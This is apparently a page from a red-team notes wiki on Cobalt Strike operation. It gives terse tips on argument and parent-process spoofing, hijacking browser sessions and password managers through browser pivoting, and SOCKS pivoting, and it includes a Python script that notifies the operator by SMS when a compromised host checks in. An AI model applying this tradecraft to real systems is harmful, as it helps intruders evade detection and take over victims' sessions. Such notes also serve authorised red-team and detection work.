CobaltStrike

can remove RWX function in beacon in mal profile

clear = clear beacon queue

Argue:

Argue take two commands, make the second look like the first:

argue whoami /totally /legit
argue powershell -command "get-adcomputer -Filter {...} .....
argue

Spawnu/ runu:

run under a different desktop session

PID/PPID spoofing:

can be used to bypass / migrate to high integrity - i.e. svchost.exe

don't use for different desktop sessions

# move to process 
spawnu x86 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
ppid MSEDGE

browser proxying:

Use browser pivot to take sessions from running browsers - jump onto password manager etc

proxy pivoting:

socks PORT

socks PORT 
# go to view > proxy pivot 
copy into msfconsole or proxychains

make sure beacon is interactive

Malleabale profiles:

use c2lint to check

Text/telegram notifications:

can enable telegram notifications by using beacon_initial to send. need aggressor, sleep and python

#!/usr/bin/env python

import argparse
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText

parser = argparse.ArgumentParser(description='beacon info')
parser.add_argument('--computer')
parser.add_argument('--ip')
args = parser.parse_args()

fromaddr = "<gmaile-mailaccounthere>"
toaddr = ["7777777777@txt.att.net", "8888888888@vtext.com"]
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = ", ".join(toaddr)
msg['Subject'] = "INCOMING BEACON"

hostname = args.computer
internal_ip = args.ip

body = "Check your teamserver! \nHostname - " + hostname + "\nInternal IP - " + internal_ip
msg.attach(MIMEText(body, 'plain'))

server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "<gmailpasswordhere>")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()

PreviousDroppers Nextteamserver

Last updated 2 years ago